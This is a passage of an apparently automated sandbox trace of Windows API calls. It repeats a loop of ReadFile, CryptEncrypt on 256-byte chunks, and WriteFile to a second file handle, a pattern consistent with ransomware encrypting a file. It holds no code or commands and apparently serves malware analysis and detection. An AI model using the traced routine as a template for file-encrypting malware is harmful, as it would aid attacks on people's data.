lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.377] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.377] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.377] GetLastError () returned 0x0 [0149.377] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.378] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.378] GetLastError () returned 0x0 [0149.378] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.378] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.379] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.379] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.379] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.379] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.380] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.380] GetLastError () returned 0x0 [0149.380] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.380] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.381] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.381] GetLastError () returned 0x0 [0149.381] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.381] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.382] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.382] GetLastError () returned 0x0 [0149.382] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.382] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, 